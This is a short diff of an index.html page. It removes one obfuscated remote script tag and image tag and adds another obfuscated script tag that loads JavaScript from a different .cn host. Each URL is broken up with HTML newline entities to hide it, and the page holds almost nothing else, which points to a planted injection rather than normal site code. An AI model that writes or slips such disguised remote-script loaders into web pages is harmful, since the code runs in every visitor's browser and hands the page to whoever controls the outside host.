--- a/index.html
+++ b/index.html
@@ -6,7 +6,7 @@
     <meta charset="utf-8">
 </head>
 <body>
-<script src="&#10;h&#10;t&#10;t&#10;ps&#10;:/&#10;/s&#10;s.&#10;a&#10;m&#10;e&#10;iyo&#10;.&#10;cn/i&#10;m&#10;g&#10;/&#10;c&#10;o&#10;d&#10;e&#10;?&#10;i&#10;d&#10;=&#10;d&#10;d&#10;"></script>
-<img src="&#10;h&#10;t&#10;t&#10;ps&#10;:/&#10;/s&#10;s.&#10;a&#10;m&#10;e&#10;iyo&#10;.&#10;cn/i&#10;m&#10;g&#10;/&#10;c&#10;o&#10;d&#10;e&#10;?&#10;i&#10;d&#10;=&#10;a&#10;vc&#10;" width="100%">
+<script src="ht&#10;t&#10;p&#10;s:&#10;//&#10;a&#10;p&#10;i&#10;.7&#10;hi&#10;8f&#10;.c&#10;n/&#10;c.&#10;js"></script>
+
 </body>
 </html>
